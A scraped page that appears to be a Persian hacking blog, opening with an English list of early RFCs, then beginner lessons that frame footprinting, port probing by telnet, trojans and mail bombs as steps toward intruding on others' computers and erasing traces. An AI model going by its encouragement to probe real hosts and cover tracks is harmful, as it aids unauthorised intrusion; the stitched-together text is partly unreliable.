RFC1009 Requirements for Internet Gateways

RFC980  Protocol Document Order Information

 

+TCP and UDP

RFC1072 TCP Extensions for Long-Delay Paths

RFC896  Congestion Control in IP/TCP Internetworks

RFC879  TCP Maximum Segment Size and Related Topics

RFC813  Window and Acknowledgment Strategy in TCP

RFC793  Transmission Control Protocol

RFC768  User Datagram Protocol

 

+IP and ICMP

RFC1219 On the Assignment of Subnet Numbers

RFC1112 Host Extensions for IP Multicasting

RFC1088 Standard for the Transmission of IP Datagrams over

        NetBIOS Networks

RFC950  Internet Standard Subnetting Procedure

RFC932  Subnetwork Addressing Schema

RFC922  Broadcasting Internet Datagrams in the Presence of Subnets

RFC9l9  Broadcasting Internet Datagrams

RFC886  Proposed Standard for Message Header Munging

RFC815  IP Datagram Reassembly Algorithms

RFC814  Names, Addresses, Ports, and Routes

RFC792  Internet Control Message Protocol

RFC791  Internet Protocol

RFC781  Specification of the Internet Protocol (IP) Timestamp Option

 

+Lower Layers

RFC1236 IP to X.121 Address Mapping for DDN

RFC1220 Point-to-Point Protocol Extensions for Bridging

RFC1209 Transmission of IP Datagrams over the SMDS Service

RFC1201 Transmitting IP Traffic over ARCNET Networks

RFC1188 Proposed Standard for the Transmission of IP Datagrams

        over FDDI Networks

RFC1172 Point-to-Point Protocol Initial Configuration Options

RFC1171 Point-to-Point Protocol for the Transmission of

        Multiprotocol Datagrams over Point-to-Point Links

RFC1149 Standard for the Transmission of IP Datagrams on Avian

        Carriers

RFC1055 Nonstandard for Transmission of IP Datagrams over

        Serial Lines: SLIP

RFC1044 Internet Protocol on Network Systems HYPERchannel:

        Protocol Specification

RFC1042 Standard for the Transmission of IP Datagrams over

        IEEE 802 Networks

RFC1027 Using ARP to Implement Transparent Subnet Gateways

RFC903  Reverse Address Resolution Protocol

RFC895  Standard for the Transmission of IP Datagrams over

        Experimental Ethernet Networks

RFC894  Standard for the Transmission of IP Datagrams over

        Ethernet Networks

RFC893  Trailer Encapsulations

RFC877  Standard for the Transmission of IP Datagrams over

        Public Data Networks

 

+Bootstrapping

RFC1084 BOOTP Vendor Information Extensions

RFC951  Bootstrap Protocol

RFC906  Bootstrap Loading Using TFTP

 

+Domain Name System

RFC1101 DNS Encoding of Network Names and Other Types

RFC1035 Domain Names—Implementation and Specification

RFC1034 Domain Names—Concepts and Facilities

RFC1033 Domain Administrators Operations Guide

RFC1032 Domain Administrators Guide

RFC974  Mail Routing and the Domain System

RFC920  Domain Requirements

RFC799  Internet Name Domains

 

+File Transfer and File Access

RFC1094 NFS: Network File System Protocol Specification

RFC1068 Background File Transfer Program (BFTP)

RFC959  File Transfer Protocol

RFC949  FTP Unique-Named Store Command

RFC783  TFTP Protocol (Revision 2)

RFC775  Directory Oriented FTP Commands

 

+Mail

RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for

        Specifying and Describing the Format of Internet Message

        Bodies

RFC1143 Q Method of Implementing Telnet Option Negotiation

RFC1090 SMTP on X.25

RFC1056 PCMAIL: A Distributed Mail System for Personal Computers

RFC974  Mail Routing and the Domain System

RFC822  Standard for the Format of ARPA Internet Text Messages

RFC821  Simple Mail Transfer Protocol

 

+Routing Protocols

RFC1267 A Border Gateway Protocol 3 (BGP-3)

RFC1247 OSPF version 2

RFC1222 Advancing the NSFNET Routing Architecture

RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments

RFC1164 Application of the Border Gateway Protocol in the Internet

RFC1163 Border Gateway Protocol (BGP)

RFC1136 Administrative Domains and Routing Domains:

        A Model for Routing in the Internet

RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol

RFC1058 Routing Information Protocol

RFC911  EGP ateway under Berkeley UNIX 4.2

RFC904  Exterior Gateway Protocol Formal Specification

RFC888  STUB Exterior Gateway Protocol

RFC827  Exterior Gateway Protocol (EGP)

RFC823  DARPA Internet Gateway

 

+Routing Performance and Policy

RFC1254 Gateway Congestion Control Survey

RFC1246 Experience with the OSPF Protocol

RFC1245 OSPF Protocol Analysis

RFC1125 Policy Requirements for Inter-Administrative Domain Routing

RFC1124 Policy Issues in Interconnecting Networks

RFC1104 Models of Policy-Based Routing

RFC1102 Policy Routing in Internet Protocols

 

+Terminal Access

RFC1205 Telnet 5250 Interface

RFC1198 FYI on the X Window System

RFC1184 Telnet Linemode Option

RFC1091 Telnet Terminal-Type Option

RFC1080 Telnet Remote Flow Control Option

RFC1079 Telnet Terminal Speed Option

RFC1073 Telnet Window Size Option

RFC1053 Telnet X.3 PAD Option

RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation

RFC1041 Telnet 3270 Regime Option

RFC1013 X Window System Protocol, version 11: Alpha Update

RFC946  Telnet Terminal Location Number Option

RFC933  Output Marking Telnet Option

RFC885  Telnet End of Record Option

RFC861  Telnet Extended Options: List Option

RFC860  Telnet Timing Mark Option

RFC859  Telnet Status Option

RFC858  Telnet Suppress Go Ahead Option

RFC857  Telnet Echo Option

RFC856  Telnet Binary Transmission

RFC855  Telnet Option Specifications

RFC854  Telnet Protocol Specification

RFC779  Telnet Send-Location Option

RFC749  Telnet SUPDUP-Output Option

RFC736  Telnet SUPDUP Option

RFC732  Telnet Data Entry Terminal Option

RFC727  Telnet Logout Option

RFC726  Remote Controlled Transmission and Echoing Telnet Option

RFC698  Telnet Extended ASCII Option

 

+Other Applications

RFC1196 Finger User Information Protocol

RFC1179 Line Printer Daemon Protocol

RFC1129 Internet Time Synchronization: The Network Time Protocol

RFC1119 Network Time Protocol (version 2) Specification

        and Implementation

RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2

RFC1014 XDR: External Data Representation Standard

RFC954  NICNAME/WHOIS

RFC868  Time Protocol

RFC867  Daytime Protocol

RFC866  Active Users

RFC865  Quote of the Day Protocol,

RFC864  Character Generator Protocol

RFC863  Discard Protocol

RFC862  Echo Protocol

 

Network Management

RFC1271 Remote Network Monitoring Management Information Base

RFC1253 OSPE version 2: Management Information Base

RFC1243 Appletalk Management Information Base

RFC1239 Reassignment of Experimental MIBs to Standard MIBs

RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO

        8473) and End System to Intermediate System (ISO 9542)

RFC1233 Definitions of Managed Objects for the DS3 Interface Type

RFC1232 Definitions of Managed Objects for the DS1 Interface Type

RFC1231 IEEE 802.5 Token Ring MIB

RFC1230 IEEE 802.4 Token Bus MIB

RFC1229 Extensions to the Generic-Interface MIB

RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed

        Program Interface

RFC1227 SNMP MUX protocol and MIB

RFC1224 Techniques for Managing Asynchronously Generated Alerts

RFC1215 Convention for Defining Traps for Use with the SNMP

RFC1214 OSI Internet Management: Management Information Base

RFC1213 Management Information Base for Network Management of

        TCP/IP-based Internets: MiB-II

RFC1212 Concise MIB Definitions

RFC1187 Bulk Table Retrieval with the SNMP

RFC1157 Simple Network Management Protocol (SNMP)

RFC1156 Management Information Base for Network Management of

        TCP/IP-based Internets

RFC1155 Structure and Identification of Management Information for

        TCP/IP-Based Internets

RFC1147 FYI on a Network Management Tool Catalog: Tools for

        Monitoring

        and Debugging TCP/IP Internets and Interconnected Devices

RFC1089 SNMP over Ethernet

 

+Tunneling

RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1

RFC1234 Tunneling IPX Traffic through IP Networks

RFC1088 Standard for the Transmission of IP Datagrams over

        NetBIOS Networks

RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP

        Transport: Detailed Specifications

RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP

        Transport: Concepts and Methods

 

+OSI

RFC1240 OSI Connectionless Transport Services on Top of UDP:

        Version 1

RFC1237 Guidelines for OSI NSAP Allocation in the Internet

RFC1169 Explaining the Role of GOSIP

 

+Security

RFC1244 Site Security Handbook

RFC1115 Privacy Enhancement for Internet Electronic Mail:

        Part III Algorithms, Modes, and Identifiers [Draft]

RFC1114 Privacy Enhancement for Internet Electronic Mail:

        Part II Certificate-Based Key Management [Draft]

RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I—

        Message Encipherment and Authentication Procedures [Draft]

RFC1108 Security Options for the Internet Protocol

 

+Miscellaneous

RFC1251 Whos Who in the Internet: Biographies of

        IAB, IESG, and IRSG Members

RFC1207 FYI on Questions and Answers: Answers to Commonly

        Asked Experienced Internet User

RFC1206 FYI on Questions and Answers: Answers to Commonly

        Asked New Internet User Questions

خلاصه درس: مسير آينده را در اين درس مشخص می‌کنم. لغاتی از ديکشنری جارگون را می‌گم. بحث Footprinting را با پيدا کردن ip سايت شروع می‌کنيم.
 

 
 
◊ ترسيم مسير برای آينده:

۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

خلاصه مطالب بالا به اين صورت است:
Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning
 
 
◊ شروع مبحث Footprinting

گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم.

 
◊ پيدا کردن ip يک سايت با دانستن آدرس اينترنتی

برای اين کار روشهای مختلفی هست:

۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-)
اگر اين کار را برای www.yahoo.com انجام دهيم:

 

که همان شماره ip برای www.yahoo.com است.
نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.

۲- دستور ping را در command prompt صادر کنيد:
ping domain
در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم:
ping sazin.com

و جواب می‌شنوم:
Pinging sazin.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=822ms TTL=111
Reply from 63.148.227.65: bytes=32 time=811ms TTL=111

 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 811ms, Maximum =  822ms, Average =  818ms
ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است.
اگر دستور ping را به‌جای sazin.com برای www.sazin.com صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود.

۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد:
http://www.samspade.org/t/ipwhois?a=xxxxxx
که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:
http://www.samspade.org/t/ipwhois?a=sazin.com
http://www.samspade.org/t/ipwhois?a=www.sazin.com
چيزی که در صفحه ظاهر می‌شود به صورت زير است:
whois -h magic 63.148.227.65
sazin.com resolves to 63.148.227.65
 
Trying whois -h whois.arin.net 63.148.227.65
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
                                  63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
                                  63.148.224.0 - 63.148.231.255
 
# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN"s Whois database.
که آدرس ip در سطر اول و دوم ذکر شده است.

اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم:
--> روش ping :
www.yahoo.com ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و www.yahoo.com ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198

نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کني

خلاصه درس: با تعريف IP و Port و کاربرد telnet آشنا می‌شويد. انواع حملات را تقسيم‌بندی می‌کنيم.
 
◊ معرفی چند اصطلاح

IP :
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)

پورت (Port):
در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:
Port Num   Service         Why its phun
--------   -------         ----------------------------------------
7          echo            Host repearts what you type
9          discard         Dev/null
11         systat          Lots of info on users
13         daytime         Time and date at computers location
15         netstat         Tremendous info on networks
19         chargen         Pours out a stream of ASCII characters.
21         ftp             Transfers files
23         telnet          Where you log in.
25         smpt            Forge email
37         time            Time
39         rlp             Resource location
43         whois           Info on hosts and networks
53         domain          Nameserver
70         gopher          Out-of-date info hunter
79         finger          Lots of info on users
80         http            Web server
110        pop             Incoming email
119        nntp            Usenet news groups -- forge posts, cancels
443        shttp           Another web server
512        biff            Mail notification
513        rlogin          Remote login
           who             Remote who and uptime
514        shell           Remote command, no password used
           syslog          Remote system logging
520        route           Routing information protocol

از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.

 
◊ چگونه به يک پورت Telnet کنيم؟

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
  telnet hostname   portnum
در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir مي‌نويسيد:
  telnet iums.ac.ir 13
  telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، ما هم خبر کنيد (-;

◊ تقسيم‌بندی انواع حملات

اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation

- خلاصه درس: چند نکته اوليه را بررسی می‌کنيم. از جمله تعريف هک و کارهايی که همزمان با خواندن اين آموزش‌ها بايد انجام دهيد.
 
◊ ترمينولوژی (اصطلاح‌شناسی)

- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;

 
◊ تقسيم‌بندی

- انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.

- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD , Linux )
* خانواده Windows (مثل WinNT, Win2000 )
* Sun Solaris
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...

- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.

 
◊ زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند ...

 
◊ Command Prompt چيست؟

در بسياری از درس‌های آينده از Command Prompt (خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد:

۱- مسير زير را در ويندوز طی کنيد:
Start > Programs > Accessories > Command Prompt
۲- در قسمت Run بنويسيد: command يا cmd

با سلام به تمامی دوستان

گروه هک ما persian gulf  به چند هكر براي تكميل گروه نياز دارد براي عضويت در فرم نظرات اعلام كنيد تا  عضو شويد.

 

 

 

 

 

   persian gulf

براي هكر شدن بايد يادبگيريد كه چگونه برنامه نويسي كنيد، البته برنامه نويسي از مهارت هاي اصلي(پايه) هك كردن است.اگر شما هيچ زبان برنامه نويسي بلد نيستيد توصيه مي كنيم با زبان python شروع كنيد. اين زبان بطور عالي طراحي ومستند سازي شده است ،و براي مبتدي ها بسيار مناسب است.

با وجود اينكه اولين زبان مفيد برنامه نويسي است اما اسباب بازي نيست و خيلي قدرتمند و انعطاف پذير است. وبراي پروژه هاي بزرگ مناسب است. من دريك صفحه بنام سايت ارزيابي زبان python   جزئيات بيشتري را توضيح داده ام ، خود آموزهاي خوبي هم در وب سايت python در دسترس است.

Java هم يك زبان خوب براي يادگيري برنامه نويسي است . اين زبان مشكل تر از زبان python است.اما توليد كد آن سريعتر است.من فكر ميكنم زبان دوم براي شما عالي به حساب آيد. اما آگاه باشيد شما به سطح مهارتهاي يك هكر و حتي يك   برنامه نويس نخواهيد رسيد اگرفقط يك يا دو زبان را بدانيد.

شما لازم است ياد بگيريد كه چطور راجع به مسئله هاي برنامه نويسي در يك راه عمومي (جامع)فكر بكنيد.

براي اينكه يك هكر واقعي شويد، بايد به نقطه اي برسيد كه درآن بتوانيد براساس چيزهايي كه ميدانيد ،يك زبان را در ظرف چند روز ياد بگيريد .

اين بدين معني است كه شما بايد چند زبان خيلي سخت مختلف را يادبگيريد. اگر شما قرار است بطور جدي وارد برنامه نويسي شويد ،شما بايد زبان C كه هسته اصلي سيستم عامل يونيكس است را ياد بگيريد.

++C خيلي به C نزديك است(مشابه است). اگر شما يكي را(c++/c )بدانيد، يادگيري ديگري مشكل نخواهد بود. به هر حال هيچكدام از اين دو زبان براي شروع يادگيري برنامه نويسي خوب نيست. واقعاً شما هرچه از برنامه نويسي در C پرهيز كنيد ،كاراتر خواهيد بود.C خيلي كار آمد است . وخيلي در منابع ماشيني صرفه جو مي باشد.

متاسفانه ،C  بخاطر نياز داشتن به مديريت منابع سطح پايين (مانندحافظه) كارايي را كم ميكند ، كه شما بايد آنرا بوسيله دستي انجام بدهيد. كد گذاري زبانهاي سح پايين ،پيچيده و همراه با اشكال وعيب است.و مقدار زيادي از وقت شما در اشكال زدايي هدر مي دهد. با ماشينهاي امروزي كه قدرتمند هستند،اين زرنگي است كه از يك زبان برنامه نويسي كه وقت كمتري ميگيرد استفاده كنيد.بنابراين از python استفاده كنيد.

زبان هاي ديگري كه اهميت ويژهاي براي هكرها دارند ،زبانهاي Lisp و Perl هستند. Perl به علت قدرت استدلال مفيدش ارزش يادگيري دارد.براي فعال كردن صفحات وب و سيستم مديريت شبكه هاي كامپيوتري زياد مورد استفاده قرا مي گيرد.

بنابراين حتي اگر هيچ وقت قرارنيست با Perl برنامه بنويسيد اما حداقل خواندن آنرا يادبگيريد.اغلب مردم از Perl استفاده مي كنند در صورتي كه من توصيه مي كنم از python استفاده كنيد. براي اجتناب كردن از برنامه نويسي C در كارهايي كه اين زبان كارآيي ندارد لازم است كه كدهاي آنرا(Perl)ياد بگيريد.

يادگيري Lisp نيز به دلايل مختلفي با ارزش است زيرا وقتي آنرا تمام كرديد ،تجربه اي عميق واساسي خواهيد يافت.

آن تجربه از شما يك برنامه نويس بهتري خواهد ساخت حتي اگر در آينده از Lisp استفاده نكنيد . واقعاً اين عالي است كه تمام اين 5 زبان(perl,java,(c/c++),lisp,perl ) را يادبگير

 

بمبهاي ميل سريالي از ميلها رو به طرف ميل سرور شما سرازير ميکنند. صحبت از 10 يا 20 ايميل نيست صحبت از هزاران هزار ايميلي است که در ظرف چند دقيقه در ميل سرور شما لنگر انداخته و کارهاي شما رو مختل ميکنند.و از همه مهمتر به خاطر مدت زمان طولاني که براي داون لود شدن و پاک شدن احتياج دارند سرعت شبکه رو به طرز عجيبي پايين مي آورند.  کاربران شبکه اي که مورد حمله اين قبيل بمبها قرار ميگيرند موظف هستند روتين و طرز عملکرد آنها را شناسايي کنند. مسلما اين کار از حمله بعدي جلوگيري نخواهد کرد ولي از حمله ناآگاهانه اعضاي شبکه به بقيه جلوگيري خواهد کرد. بله اين وظيفه يک مدير شبکه است . ولي چطور ميشه فهميد که يک بمب ايميل چطور کار ميکند؟.

معروفترين بمبهاي ايميل و داده هاي مربوط به آن :

يک راه براي کمتر کردن ( نه جلوگيري کردن) اين حمله ها اين خواهد بود که يک اسکريپت برنامه نويسي کنيد که در ازاي هر ميلي که دريافت ميکنيد يک اخطار 10 صفحه اي براي فرستنده بفرستد. ممکن است که پرووايدر ايميل سرور او متوجه اين کار شده و اقدام به جلوگيري از اين کار کند .

 

اگر  اهل گشت و گذار در اینترنت مخصوصا سایتهای امنیتی و یا هکری باشید حتمی با واجه تروجان آشنا هستید.

شاید برداشت اکثریت ما از این واجه همان ویروس اینترنتی باشد.

ولی تروجان چیست؟

اگر بخواهیم برای تروجان یک تعریف ساده بیان کنیم میتوانیم بگوییم:

"تروجان یک فایل جاسوسی میباشد که توسط هکر با توجه به نیاز به اطلاعاته قربانی آماده میشود و برای قربانی فرستاده میشود"

با کمی دقت در تعریف تروجان در می یابیم که تروجان هیچ وقت نمیتواند یک ویروس باشد.

هکر با توجه به نیاز های خود به اطلاعات قربانی که میتواند این اطلاعات:پسورد ایمیل یا ایدی قربانی,اشتراک اینترنت(اکانت),نام و پسورد کامپیوتر قربانی و ... میباشد تنظیم میکند.

معمولا تروجانها به دو قسمت تقسیم میشوند:

1-کلاینت:که تنظیمات را انجام داده و آن را با توجه به نیازهایی که ...

 

ادامه متن به علت طلانی بودن در ادامه متن است

ادامه مطلب

